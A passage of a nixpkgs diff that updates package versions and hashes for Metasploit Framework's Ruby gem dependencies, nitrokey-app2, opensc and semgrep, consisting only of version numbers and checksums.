1.1) - aws-sdk-kms (1.75.0) - aws-sdk-core (~> 3, >= 3.188.0) + aws-sdk-kms (1.77.0) + aws-sdk-core (~> 3, >= 3.191.0) aws-sigv4 (~> 1.1) - aws-sdk-s3 (1.141.0) - aws-sdk-core (~> 3, >= 3.189.0) + aws-sdk-s3 (1.143.0) + aws-sdk-core (~> 3, >= 3.191.0) aws-sdk-kms (~> 1) aws-sigv4 (~> 1.8) - aws-sdk-ssm (1.162.0) - aws-sdk-core (~> 3, >= 3.188.0) + aws-sdk-ssm (1.165.0) + aws-sdk-core (~> 3, >= 3.191.0) aws-sigv4 (~> 1.1) aws-sigv4 (1.8.0) aws-eventstream (~> 1, >= 1.0.2) base64 (0.2.0) bcrypt (3.1.20) bcrypt_pbkdf (1.1.0) - bindata (2.4.15) - bootsnap (1.17.0) + bigdecimal (3.1.6) + bindata (2.5.0) + bootsnap (1.18.3) msgpack (~> 1.2) - bson (4.15.0) + bson (5.0.0) builder (3.2.4) chunky_png (1.4.0) - concurrent-ruby (1.2.2) - cookiejar (0.3.3) + concurrent-ruby (1.2.3) + cookiejar (0.3.4) crass (1.0.6) daemons (1.4.1) date (3.3.4) dnsruby (1.70.0) simpleidn (~> 0.2.1) - domain_name (0.6.20231109) + domain_name (0.6.20240107) ed25519 (1.3.0) em-http-request (1.1.7) addressable (>= 2.3.4) @@ -190,13 +191,12 @@ GEM eventmachine (>= 1.0.0.beta.4) erubi (1.12.0) eventmachine (1.2.7) - faker (3.2.2) + faker (3.2.3) i18n (>= 1.8.11, < 2) - faraday (2.8.1) - base64 - faraday-net_http (>= 2.0, < 3.1) - ruby2_keywords (>= 0.0.4) - faraday-net_http (3.0.2) + faraday (2.9.0) + faraday-net_http (>= 2.0, < 3.2) + faraday-net_http (3.1.0) + net-http faraday-retry (2.2.0) faraday (~> 2.0) faye-websocket (0.11.3) @@ -220,7 +220,7 @@ GEM httpclient (2.8.3) i18n (1.14.1) concurrent-ruby (~> 1.0) - io-console (0.7.1) + io-console (0.7.2) irb (1.7.4) reline (>= 0.3.6) jmespath (1.6.2) @@ -240,7 +240,7 @@ GEM activesupport (~> 7.0) railties (~> 7.0) zeitwerk - metasploit-credential (6.0.6) + metasploit-credential (6.0.8) metasploit-concern metasploit-model metasploit_data_models (>= 5.0.0) @@ -268,20 +268,22 @@ GEM metasploit_payloads-mettle (1.0.26) method_source (1.0.0) mini_portile2 (2.8.5) - minitest (5.20.0) + minitest (5.22.2) mqtt (0.6.0) msgpack (1.6.1) multi_json (1.15.0) mustermann (3.0.0) ruby2_keywords (~> 0.0.1) nessus_rest (0.1.6) - net-imap (0.4.8) + net-http (0.4.1) + uri + net-imap (0.4.10) date net-protocol - net-ldap (0.18.0) + net-ldap (0.19.0) net-protocol (0.2.2) timeout - net-smtp (0.4.0) + net-smtp (0.4.0.1) net-protocol net-ssh (7.2.1) network_interface (0.0.4) @@ -290,7 +292,8 @@ GEM nokogiri (1.14.5) mini_portile2 (~> 2.8.0) racc (~> 1.4) - nori (2.6.0) + nori (2.7.0) + bigdecimal octokit (4.25.1) faraday (>= 1, < 3) sawyer (~> 0.9) @@ -301,19 +304,20 @@ GEM pcaprub (~> 0.13.1) patch_finder (1.0.2) pcaprub (0.13.1) - pdf-reader (2.11.0) + pdf-reader (2.12.0) Ascii85 (~> 1.0) afm (~> 0.2.1) hashery (~> 2.0) ruby-rc4 ttfunk - pg (1.5.4) + pg (1.5.6) public_suffix (5.0.4) - puma (6.4.0) + puma (6.4.2) nio4r (~> 2.0) racc (1.7.3) - rack (2.2.8) - rack-protection (3.1.0) + rack (2.2.8.1) + rack-protection (3.2.0) + base64 (>= 0.1.0) rack (~> 2.2, >= 2.2.4) rack-test (2.1.0) rack (>= 1.3) @@ -324,21 +328,21 @@ GEM rails-html-sanitizer (1.6.0) loofah (~> 2.21) nokogiri (~> 1.14) - railties (7.0.8) - actionpack (= 7.0.8) - activesupport (= 7.0.8) + railties (7.0.8.1) + actionpack (= 7.0.8.1) + activesupport (= 7.0.8.1) method_source rake (>= 12.2) thor (~> 1.0) zeitwerk (~> 2.5) rake (13.1.0) - rasn1 (0.12.1) + rasn1 (0.13.0) strptime (~> 0.2.5) rb-readline (0.5.5) recog (3.1.4) nokogiri redcarpet (3.6.0) - reline (0.4.1) + reline (0.4.3) io-console (~> 0.5) rex-arch (0.1.15) rex-text @@ -378,23 +382,23 @@ GEM metasm rex-core rex-text - rex-socket (0.1.55) + rex-socket (0.1.56) rex-core rex-sslscan (0.1.10) rex-core rex-socket rex-text rex-struct2 (0.1.4) - rex-text (0.2.55) + rex-text (0.2.56) rex-zip (0.1.5) rex-text rexml (3.2.6) rkelly-remix (0.0.7) - ruby-macho (4.0.0) + ruby-macho (4.0.1) ruby-mysql (4.1.0) ruby-rc4 (0.1.5) ruby2_keywords (0.0.5) - ruby_smb (3.3.1) + ruby_smb (3.3.2) bindata openssl-ccm openssl-cmac @@ -407,12 +411,12 @@ GEM faraday (>= 0.17.3, < 3) simpleidn (0.2.1) unf (~> 0.1.4) - sinatra (3.1.0) + sinatra (3.2.0) mustermann (~> 3.0) rack (~> 2.2, >= 2.2.4) - rack-protection (= 3.1.0) + rack-protection (= 3.2.0) tilt (~> 2.0) - sqlite3 (1.6.9) + sqlite3 (1.7.2) mini_portile2 (~> 2.8.0) sshkey (3.0.0) strptime (0.2.5) @@ -421,18 +425,19 @@ GEM daemons (~> 1.0, >= 1.0.9) eventmachine (~> 1.0, >= 1.0.4) rack (>= 1, < 3) - thor (1.3.0) + thor (1.3.1) tilt (2.3.0) timeout (0.4.1) ttfunk (1.7.0) tzinfo (2.0.6) concurrent-ruby (~> 1.0) - tzinfo-data (1.2023.3) + tzinfo-data (1.2024.1) tzinfo (>= 1.0.0) unf (0.1.4) unf_ext unf_ext (0.0.9.1) unix-crypt (1.3.1) + uri (0.13.0) warden (1.2.9) rack (>= 2.0.9) webrick (1.8.1) @@ -455,7 +460,7 @@ GEM activesupport (>= 4.2, < 8.0) xmlrpc (0.3.3) webrick - zeitwerk (2.6.12) + zeitwerk (2.6.13) PLATFORMS ruby @@ -464,4 +469,4 @@ DEPENDENCIES metasploit-framework! BUNDLED WITH - 2.5.5 + 2.4.13 diff --git a/nixpkgs/pkgs/tools/security/metasploit/default.nix b/nixpkgs/pkgs/tools/security/metasploit/default.nix index ebfb36b8227c..a0d8a05c0821 100644 --- a/nixpkgs/pkgs/tools/security/metasploit/default.nix +++ b/nixpkgs/pkgs/tools/security/metasploit/default.nix @@ -15,13 +15,13 @@ let }; in stdenv.mkDerivation rec { pname = "metasploit-framework"; - version = "6.3.57"; + version = "6.3.58"; src = fetchFromGitHub { owner = "rapid7"; repo = "metasploit-framework"; rev = "refs/tags/${version}"; - hash = "sha256-MToWengiF4dacD6E0byZENNMh408d3YJ18sn93nEksI="; + hash = "sha256-NUm+6vWmSpGpy4KGXQ/pQDqeU3ORhQrQwwicFCMyjhg="; }; nativeBuildInputs = [ diff --git a/nixpkgs/pkgs/tools/security/metasploit/gemset.nix b/nixpkgs/pkgs/tools/security/metasploit/gemset.nix index b9285cdab6b1..5cfb435137d2 100644 --- a/nixpkgs/pkgs/tools/security/metasploit/gemset.nix +++ b/nixpkgs/pkgs/tools/security/metasploit/gemset.nix @@ -4,50 +4,50 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1l319p0gipfgq8bp8dvbv97qqb72rad9zcqn5snhgv20cmpqr69b"; + sha256 = "0jh83rqd6glys1b2wsihzsln8yk6zdwgiyn9xncyiav9rcwjpkax"; type = "gem"; }; - version = "7.0.8"; + version = "7.0.8.1"; }; actionview = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0xnpdwj1d8m6c2d90jp9cs50ggiz0jj02ls2h9lg68k4k8mnjbd2"; + sha256 = "1ygpg75f3ffdcbxvf7s14xw3hcjin1nnx1nk3mg9mj2xc1nb60aa"; type = "gem"; }; - version = "7.0.8"; + version = "7.0.8.1"; }; activemodel = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "004w8zaz2g3y6lnrsvlcmljll0m3ndqpgwf0wfscgq6iysibiglm"; + sha256 = "0grdpvglh0cj96qhlxjj9bcfqkh13c1pfpcwc9ld3aw0yzvsw5a1"; type = "gem"; }; - version = "7.0.8"; + version = "7.0.8.1"; }; activerecord = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "04wavps80q3pvhvfbmi4gs102y1p6mxbg8xylzvib35b6m92adpj"; + sha256 = "0rlky1cr5kcdl0jad3nk5jpim6vjzbgkfhxnk7y492b3j2nznpcf"; type = "gem"; }; - version = "7.0.8"; + version = "7.0.8.1"; }; activesupport = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "188kbwkn1lbhz40ala8ykp20jzqphgc68g3d8flin8cqa2xid0s5"; + sha256 = "0ff3x7q400flzhml131ix8zfwmh13h70rs6yzbzf513g781gbbxh"; type = "gem"; }; - version = "7.0.8"; + version = "7.0.8.1"; }; addressable = { groups = ["default"]; @@ -104,80 +104,80 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1ddbcz8p3abbw8d8pn796z1ry1mbapl6ayhh37ziwal6bd047kvm"; + sha256 = "018hh97dcj3nd80jb1cf63fxk6h8gc4rrq118bv9npnw5ahd5pv8"; type = "gem"; }; - version = "1.872.0"; + version = "1.895.0"; }; aws-sdk-core = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1ansagfl5irx1y6b9xf4xpi9j6q6k5pbd2aw80hn0p4m3ycafamh"; + sha256 = "088nq8yz9n4p7pnhjwp9nbxlkj7jwchpkzvnl4nybfb1dkvk4dns"; type = "gem"; }; - version = "3.190.1"; + version = "3.191.3"; }; aws-sdk-ec2 = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "04lg4g6aivkf6zvvcc1clw0dqdlpkn3c87kiz5mfc7m2jr0m0ljx"; + sha256 = "1kcsfkpfqx96ax1slvl4lq61cdasaki6hddi22ja1zyc1ak4x9dg"; type = "gem"; }; - version = "1.431.0"; + version = "1.440.0"; }; aws-sdk-ec2instanceconnect = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1iifrmdls17a3hniq43iyj9q4mr8iy0danqmy65xbh05bnqq2ca9"; + sha256 = "0hd4xdhf6b2bvfb4h9fc0c96vwz30cmdhra3r7zpdllhz7d1hh5q"; type = "gem"; }; - version = "1.36.0"; + version = "1.37.0"; }; aws-sdk-iam = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0whclpcvbdy7gzvqpk8734nxjfxs3362k197xl1wnrpixklkacyz"; + sha256 = "1ymb6lnkmhi98lwk402msanr7i012k82pvspd2rd66aq0vdql9rd"; type = "gem"; }; - version = "1.92.0"; + version = "1.94.0"; }; aws-sdk-kms = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1qzxqfgrhnl5rdc39a1gl2pgrdxgnsj12zycpxnsx8lg6arfmnr1"; + sha256 = "1gbxms3daszl4mk89swjrpq3fqgm9lg0wl65yjfp0nfz8jm4jyqf"; type = "gem"; }; - version = "1.75.0"; + version = "1.77.0"; }; aws-sdk-s3 = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0bnhpmi0iiaj88rqc5lhhnp2gyrk4fs8xz51lj36wwzng94qinya"; + sha256 = "1safbxycz517m2v981z8kbmdiqx9jypl093ia0mcrskkgh4fyb3s"; type = "gem"; }; - version = "1.141.0"; + version = "1.143.0"; }; aws-sdk-ssm = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0xz10344dwm4pj8qnl19bnh99arxp7cd9mn2alslrnw7y2gipzz1"; + sha256 = "1wbizrm7spkwx6rnwmwbxyg16mpkn3hllxz8aj7v2dlplzkwksb6"; type = "gem"; }; - version = "1.162.0"; + version = "1.165.0"; }; aws-sigv4 = { groups = ["default"]; @@ -219,35 +219,45 @@ }; version = "1.1.0"; }; + bigdecimal = { + groups = ["default"]; + platforms = []; + source = { + remotes = ["https://rubygems.org"]; + sha256 = "00db5v09k1z3539g1zrk7vkjrln9967k08adh6qx33ng97a2gg5w"; + type = "gem"; + }; + version = "3.1.6"; + }; bindata = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "04y4zgh4bbcb8wmkxwfqg4saky1d1f3xw8z6yk543q13h8ky8rz5"; + sha256 = "08r67nglsqnxrbn803szf5bdnqhchhq8kf2by94f37fcl65wpp19"; type = "gem"; }; - version = "2.4.15"; + version = "2.5.0"; }; bootsnap = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0iqkzby0fdgi786m873nm0ckmc847wy9a4ydinb29m7hd3fs83kb"; + sha256 = "1srlq3gqirzdkhv12ljpnp5cb0f8jfrl3n8xs9iivyz2c7khvdyp"; type = "gem"; }; - version = "1.17.0"; + version = "1.18.3"; }; bson = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "19vgs9rzzyvd7jfrzynjnc6518q0ffpfciyicfywbp77zl8nc9hk"; + sha256 = "1wsim17cdr4ps7ca6q5gkidkasfw4g4qr5zn1aclnbn4xpnhpx4d"; type = "gem"; }; - version = "4.15.0"; + version = "5.0.0"; }; builder = { groups = ["default"]; @@ -274,20 +284,20 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0krcwb6mn0iklajwngwsg850nk8k9b35dhmc2qkbdqvmifdi2y9q"; + sha256 = "1qh1b14jwbbj242klkyz5fc7npd4j0mvndz62gajhvl1l3wd7zc2"; type = "gem"; }; - version = "1.2.2"; + version = "1.2.3"; }; cookiejar = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0q0kmbks9l3hl0wdq744hzy97ssq9dvlzywyqv9k9y1p3qc9va2a"; + sha256 = "1px0zlnlkwwp9prdkm2lamgy412y009646n2cgsa1xxsqk7nmc8i"; type = "gem"; }; - version = "0.3.3"; + version = "0.3.4"; }; crass = { groups = ["default"]; @@ -334,10 +344,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1gpciaifmxql8h01ci12qq08dnqrdlzkkz6fmia9v9yc3r9a29si"; + sha256 = "0cyr2xm576gqhqicsyqnhanni47408w2pgvrfi8pd13h2li3nsaz"; type = "gem"; }; - version = "0.6.20231109"; + version = "0.6.20240107"; }; ed25519 = { groups = ["default"]; @@ -394,30 +404,30 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1ic47k6f0q6xl9g2yxa3x60gfbwx98wnx75qnbhhgk0zc7a5ijhy"; + sha256 = "1rrwh78515yqljh09wjxfsb64siqd8qgp4hv57syajhza5x8vbzz"; type = "gem"; }; - version = "3.2.2"; + version = "3.2.3"; }; faraday = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "19p45ryrvxff6ggdj4fq76dk7wlkfgrh474c3kwzdsjx3xpdq8x8"; + sha256 = "1qqb1rmk0f9m82iijjlqadh5yby1bhnr6svjk9vxdvh6f181988s"; type = "gem"; }; - version = "2.8.1"; + version = "2.9.0"; }; faraday-net_http = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "13byv3mp1gsjyv8k0ih4612y6vw5kqva6i03wcg4w2fqpsd950k8"; + sha256 = "17w51yk4rrm9rpnbc3x509s619kba0jga3qrj4b17l30950vw9qn"; type = "gem"; }; - version = "3.0.2"; + version = "3.1.0"; }; faraday-retry = { groups = ["default"]; @@ -554,10 +564,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1fmwbcapyhla84xhwj3gfws6rb4lw3928ybz6g3lr372dgxakzx5"; + sha256 = "08d2lx42pa8jjav0lcjbzfzmw61b8imxr9041pva8xzqabrczp7h"; type = "gem"; }; - version = "0.7.1"; + version = "0.7.2"; }; irb = { groups = ["default"]; @@ -654,22 +664,22 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1nmh37pss5bsxjasl52pi9jxnzv75wacpnhrif5cprg6jxwn8dzl"; + sha256 = "0v1bylci121psqg669lgxpp6d965m4xxmg1djvmy0srcys8dvp5n"; type = "gem"; }; - version = "6.0.6"; + version = "6.0.8"; }; metasploit-framework = { groups = ["default"]; platforms = []; source = { fetchSubmodules = false; - rev = "e01334b3bd267539df650f14627231fb8e4bc21d"; - sha256 = "1hljqiwzf9ybsw4pcxrwin3lrlqhk6yd311yf1d8f5r2g1x1cfii"; + rev = "08ebefe2368f73ceeac2c5f9c20a49a82d6a969e"; + sha256 = "064f68ii9708qg80m1cifd9rwfj0x47mv1l2rflr2jm6ypmbwj9m"; type = "git"; url = "https://github.com/rapid7/metasploit-framework"; }; - version = "6.3.57"; + version = "6.3.58"; }; metasploit-model = { groups = ["default"]; @@ -736,10 +746,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0bkmfi9mb49m0fkdhl2g38i3xxa02d411gg0m8x0gvbwfmmg5ym3"; + sha256 = "0667vf0zglacry87nkcl3ns8421aydvz71vfa3g3yjhiq8zh19f5"; type = "gem"; }; - version = "5.20.0"; + version = "5.22.2"; }; mqtt = { groups = ["default"]; @@ -791,25 +801,35 @@ }; version = "0.1.6"; }; + net-http = { + groups = ["default"]; + platforms = []; + source = { + remotes = ["https://rubygems.org"]; + sha256 = "10n2n9aq00ih8v881af88l1zyrqgs5cl3njdw8argjwbl5ggqvm9"; + type = "gem"; + }; + version = "0.4.1"; + }; net-imap = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1wnmxcrpv7zaf8wli5nvfnz5ybmw7f3r06s05p3d96idc61193mv"; + sha256 = "0zn7j2w0hc622ig0rslk4iy6yp3937dy9ibhyr1mwwx39n7paxaj"; type = "gem"; }; - version = "0.4.8"; + version = "0.4.10"; }; net-ldap = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0xqcffn3c1564c4fizp10dzw2v5g2pabdzrcn25hq05bqhsckbar"; + sha256 = "0g9gz39bs2iy4ky4fhjphimqd9m9wdsaz50anxgwg3yjrff3famy"; type = "gem"; }; - version = "0.18.0"; + version = "0.19.0"; }; net-protocol = { groups = ["default"]; @@ -826,10 +846,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1rx3758w0bmbr21s2nsc6llflsrnp50fwdnly3ixra4v53gbhzid"; + sha256 = "0csspzqrg7s2v2wdp6vqqs1rra6w5ilpgnps5h52ig6rp7x2i389"; type = "gem"; }; - version = "0.4.0"; + version = "0.4.0.1"; }; net-ssh = { groups = ["default"]; @@ -887,10 +907,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "066wc774a2zp4vrq3k7k8p0fhv30ymqmxma1jj7yg5735zls8agn"; + sha256 = "12wfv36jzc0978ij5c56nnfh5k8ax574njawigs98ysmp1x5s2ql"; type = "gem"; }; - version = "2.6.0"; + version = "2.7.0"; }; octokit = { groups = ["default"]; @@ -967,20 +987,20 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "09sx25jpnip2sp6wh5sn5ad7za78rfi95qp5iiczfh43z4jqa8q3"; + sha256 = "0n0pp7blk3np3fqsb54l34fsamrww80cp3dhlhskfayg7542mrv1"; type = "gem"; }; - version = "2.11.0"; + version = "2.12.0"; }; pg = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0pfj771p5a29yyyw58qacks464sl86d5m3jxjl5rlqqw2m3v5xq4"; + sha256 = "071b55bhsz7mivlnp2kv0a11msnl7xg5awvk8mlflpl270javhsb"; type = "gem"; }; - version = "1.5.4"; + version = "1.5.6"; }; public_suffix = { groups = ["default"]; @@ -997,10 +1017,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1y8jcw80zcxvdq0id329lzmp5pzx7hpac227d7sgjkblc89s3pfm"; + sha256 = "0i2vaww6qcazj0ywva1plmjnj6rk23b01szswc5jhcq7s2cikd1y"; type = "gem"; }; - version = "6.4.0"; + version = "6.4.2"; }; racc = { groups = ["default"]; @@ -1017,20 +1037,20 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "15rdwbyk71c9nxvd527bvb8jxkcys8r3dj3vqra5b3sa63qs30vv"; + sha256 = "10mpk0hl6hnv324fp1pfimi2nw9acj0z4gyhrph36qg84pk1s4m7"; type = "gem"; }; - version = "2.2.8"; + version = "2.2.8.1"; }; rack-protection = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0xsz78hccgza144n37bfisdkzpr2c8m0xl6rnlzgxdbsm1zrkg7r"; + sha256 = "1zzvivmdb4dkscc58i3gmcyrnypynsjwp6xgc4ylarlhqmzvlx1w"; type = "gem"; }; - version = "3.1.0"; + version = "3.2.0"; }; rack-test = { groups = ["default"]; @@ -1067,10 +1087,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0sfc16zrcn4jgf5xczb08n6prhmqqgg9f0b4mn73zlzg6cwmqchj"; + sha256 = "08ga56kz6a37dnlmi7y45r19fcc7jzb62mrc3ifavbzggmhy7r62"; type = "gem"; }; - version = "7.0.8"; + version = "7.0.8.1"; }; rake = { groups = ["default"]; @@ -1087,10 +1107,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "05n3ki7jlkll0rf6zrqi41a9fc6zmw87f94ai21jgmvsswjfx15i"; + sha256 = "07dvrv2s9hs2vcbr6lai8vj4vk2i3m4jf468hyvkp9k8xzjvc0fi"; type = "gem"; }; - version = "0.12.1"; + version = "0.13.0"; }; rb-readline = { groups = ["default"]; @@ -1127,10 +1147,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1hi6zfj6zqzxcbamhjm9w9cswv62f76l8gsdfcnmhpw35cyxphh8"; + sha256 = "1zx7sdh11p4z77c3f9ka6f065mgl6xwbamnsq4rrgwk310qhn41n"; type = "gem"; }; - version = "0.4.1"; + version = "0.4.3"; }; rex-arch = { groups = ["default"]; @@ -1267,10 +1287,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0qs8fq14ivhnhssq966ikxdis864gw80pfbxllbs35v0njw46nj3"; + sha256 = "0vd9gfhyplwg2y55jk1c6nfsin733dy831x8zx78cp2lxp07s0p7"; type = "gem"; }; - version = "0.1.55"; + version = "0.1.56"; }; rex-sslscan = { groups = ["default"]; @@ -1297,10 +1317,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1finkvvmxa654mldx1vqpnl9w1xvjp0s7lyb7qjymlphvbj3mi40"; + sha256 = "108x7k7x0ghc1zzqwbmja1f81b1wnllpda2rzbkws9ckvqx0cayf"; type = "gem"; }; - version = "0.2.55"; + version = "0.2.56"; }; rex-zip = { groups = ["default"]; @@ -1337,10 +1357,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1yf8fq0l5hlqkjklcpxmg6vhzvbyigwd2n441aq42b2wa2f8xj5q"; + sha256 = "06addh9m9z25kpk52z56v6ygvg43sjxmqwb2qqx7rg7y55zlp3ks"; type = "gem"; }; - version = "4.0.0"; + version = "4.0.1"; }; ruby-mysql = { groups = ["default"]; @@ -1377,10 +1397,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "04m366ldi33h79k7f35dvyhq0jyh762v8360zf8ss5jbax3bzlkk"; + sha256 = "1yy5z53mp2l3d8k8dhf8s8hbscmgd829j50nfcgmqrli0vvz0s1a"; type = "gem"; }; - version = "3.3.1"; + version = "3.3.2"; }; rubyntlm = { groups = ["default"]; @@ -1427,20 +1447,20 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "00541cnypsh1mnilfxxqlz6va9afrixf9m1asn4wzjp5m59777p8"; + sha256 = "01wq20aqk5kfggq3wagx5xr1cz0x08lg6dxbk9yhd1sf0d6pywkf"; type = "gem"; }; - version = "3.1.0"; + version = "3.2.0"; }; sqlite3 = { groups = ["default"]; platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "08irz5llz31im8pmkk5k0kw433jyyji1qa98xkdmpphncdjr38am"; + sha256 = "137xkh8jnk3xyajvzmn2390yzs13hnb37jylr0sm02d3zrshf18n"; type = "gem"; }; - version = "1.6.9"; + version = "1.7.2"; }; sshkey = { groups = ["default"]; @@ -1487,10 +1507,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1hx77jxkrwi66yvs10wfxqa8s25ds25ywgrrf66acm9nbfg7zp0s"; + sha256 = "1vq1fjp45az9hfp6fxljhdrkv75cvbab1jfrwcw738pnsiqk8zps"; type = "gem"; }; - version = "1.3.0"; + version = "1.3.1"; }; tilt = { groups = ["default"]; @@ -1537,10 +1557,10 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "0m2d0gpsgqnv29j5h2d6g57g0rayvd460b8s2vjr8sn46bqf89m5"; + sha256 = "1rg1dmx6mknjazb8qq0j9sb9fah470my5sbjb6f3pa6si5018682"; type = "gem"; }; - version = "1.2023.3"; + version = "1.2024.1"; }; unf = { groups = ["default"]; @@ -1572,6 +1592,16 @@ }; version = "1.3.1"; }; + uri = { + groups = ["default"]; + platforms = []; + source = { + remotes = ["https://rubygems.org"]; + sha256 = "094gk72ckazf495qc76gk09b5i318d5l9m7bicg2wxlrjcm3qm96"; + type = "gem"; + }; + version = "0.13.0"; + }; warden = { groups = ["default"]; platforms = []; @@ -1667,9 +1697,9 @@ platforms = []; source = { remotes = ["https://rubygems.org"]; - sha256 = "1gir0if4nryl1jhwi28669gjwhxb7gzrm1fcc8xzsch3bnbi47jn"; + sha256 = "1m67qmsak3x8ixs8rb971azl3l7wapri65pmbf5z886h46q63f1d"; type = "gem"; }; - version = "2.6.12"; + version = "2.6.13"; }; } diff --git a/nixpkgs/pkgs/tools/security/nitrokey-app2/default.nix b/nixpkgs/pkgs/tools/security/nitrokey-app2/default.nix index d56e882cb09e..6f392f5d7f53 100644 --- a/nixpkgs/pkgs/tools/security/nitrokey-app2/default.nix +++ b/nixpkgs/pkgs/tools/security/nitrokey-app2/default.nix @@ -1,20 +1,38 @@ { lib -, buildPythonApplication +, python3 +, fetchPypi +, rustPlatform , fetchFromGitHub -, pythonOlder -, pyside6 -, poetry-core -, pynitrokey -, pyudev -, qt-material }: -buildPythonApplication rec { +let + python = python3.override { + packageOverrides = self: super: { + # https://github.com/nxp-mcuxpresso/spsdk/issues/64 + cryptography = super.cryptography.overridePythonAttrs (old: rec { + version = "41.0.7"; + src = fetchPypi { + inherit (old) pname; + inherit version; + hash = "sha256-E/k86b6oAWwlOzSvxr1qdZk+XEBnLtVAWpyDLw1KALw="; + }; + cargoDeps = rustPlatform.fetchCargoTarball { + inherit src; + sourceRoot = "${old.pname}-${version}/${old.cargoRoot}"; + name = "${old.pname}-${version}"; + hash = "sha256-VeZhKisCPDRvmSjGNwCgJJeVj65BZ0Ge+yvXbZw86Rw="; + }; + patches = [ ]; + doCheck = false; # would require overriding cryptography-vectors + }); + }; + }; +in python.pkgs.buildPythonApplication rec { pname = "nitrokey-app2"; version = "2.1.5"; pyproject = true; - disabled = pythonOlder "3.9"; + disabled = python.pythonOlder "3.9"; src = fetchFromGitHub { owner = "Nitrokey"; @@ -31,11 +49,11 @@ buildPythonApplication rec { substituteInPlace pyproject.toml --replace 'pynitrokey = "' 'pynitrokey = ">=' ''; - nativeBuildInputs = [ + nativeBuildInputs = with python.pkgs; [ poetry-core ]; - propagatedBuildInputs = [ + propagatedBuildInputs = with python.pkgs; [ pynitrokey pyudev pyside6 diff --git a/nixpkgs/pkgs/tools/security/opensc/default.nix b/nixpkgs/pkgs/tools/security/opensc/default.nix index 856921edbf18..6edc9a7da55c 100644 --- a/nixpkgs/pkgs/tools/security/opensc/default.nix +++ b/nixpkgs/pkgs/tools/security/opensc/default.nix @@ -8,13 +8,13 @@ stdenv.mkDerivation rec { pname = "opensc"; - version = "0.24.0"; + version = "0.25.0"; src = fetchFromGitHub { owner = "OpenSC"; repo = "OpenSC"; rev = version; - sha256 = "sha256-1mm0b4AAtX0AgjShpU1FR6e7pUkea5TOJdIGkNQgjuE="; + sha256 = "sha256-pNorJiZzLGpxtlkog2d3E9xePMy9ASoHeWduqVZiBiA="; }; nativeBuildInputs = [ pkg-config autoreconfHook ]; diff --git a/nixpkgs/pkgs/tools/security/semgrep/common.nix b/nixpkgs/pkgs/tools/security/semgrep/common.nix index 3f8d8a954344..57f5163f4cbf 100644 --- a/nixpkgs/pkgs/tools/security/semgrep/common.nix +++ b/nixpkgs/pkgs/tools/security/semgrep/common.nix @@ -1,9 +1,9 @@ { lib }: rec { - version = "1.62.0"; + version = "1.63.0"; - srcHash = "sha256-P6plFE/tUVR6KvTZ+6RYr+Wq9W8hI7wmVnap4NMQAZU="; + srcHash = "sha256-VMB+slexCXxv9z6kOxbYQrnet6sb4ZKTATXWkLix9u4="; # submodule dependencies # these are fetched so we: @@ -13,8 +13,8 @@ rec { "cli/src/semgrep/semgrep_interfaces" = { owner = "semgrep"; repo = "semgrep-interfaces"; - rev = "bbfd1c5b91bd411bceffc3de73f5f0b37f04433d"; - hash = "sha256-wrhV5bBuIpVYehzVTxussiED//ObJXQSfPiiKnIR/DM="; + rev = "8751faab89f23f7af3a92f5d4d4e6451ccaa205a"; + hash = 